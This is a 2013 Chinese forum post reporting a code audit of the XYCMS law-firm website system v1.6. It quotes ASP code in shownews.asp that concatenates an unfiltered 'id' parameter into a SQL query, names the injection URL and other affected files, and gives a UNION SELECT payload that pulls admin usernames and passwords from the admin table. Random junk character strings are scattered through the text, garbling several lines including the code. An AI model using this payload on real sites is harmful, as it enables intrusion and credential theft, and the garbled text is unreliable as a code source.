前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
1 T; V+ o* R9 J: u3 Z
9 T. b2 w, Y* i4 J1 D; E淫荡分割线
' h1 a1 S$ F+ j9 K+ S8 z--------------------------------------------------------. p: `% q" P3 w% X& O) G6 t
3 O: n' Y6 P9 U9 L- |
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)" w# ~" F% l1 o9 s& E7 b* m% h3 u7 S
源码地址:http://down.chinaz.com/soft/29233.htm; W! \; G; E; O
$ ~9 w3 r+ |; z* k) J+ S漏洞文件:shownews.asp; R! b6 O2 b" N; F: k( |8 N
漏洞代码:7-13行; T3 L, o1 J, P7 ]
# h% B" @; u1 O/ T+ ]6 s2 P
r1 ]; K+ m& Z. J
<% n3 Q1 {% V: c+ ~" ^
id=request.QueryString("id")
& r0 W0 S( }' w
& i ~* h' Y' n4 `/ uset snews=server.createobject("adodb.recordset")
) ~- r: t# W& N& r' w4 v7 oexec="select * from [news] where id="&id* p y8 `- k5 l! ^! ^
snews.open exec,conn,1,1
9 K! F; x, I" L9 e8 T& a0 V7 O%>
6 k0 L1 v# ^" O4 b$ n3 X. @8 g
! u3 x( k8 H2 W# q% w# m . j" M) T$ I( |* |$ q! L
什么过滤都没有 直造成注入+ \) t) C R! x
9 S; I# e9 o' G8 {% y) D注入点:http://127.0.0.1:99/shownews.asp?id=xx
* I$ p6 F. Y* B% J/ q% ~6 F
) q. ?7 D4 N( }其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
A5 H7 ]# ?, k
8 R$ q$ X" A* D- \& o D* D& s 0 j& c. n" S/ C5 s/ {
exp: union select 1,admin,password,4,5,7 from admin_user0 e e2 j& Z& h# t0 Y, q
' J! w c% v# P. R) a( h
|
发表于 2013-4-4 17:28:12
收藏
支持
反对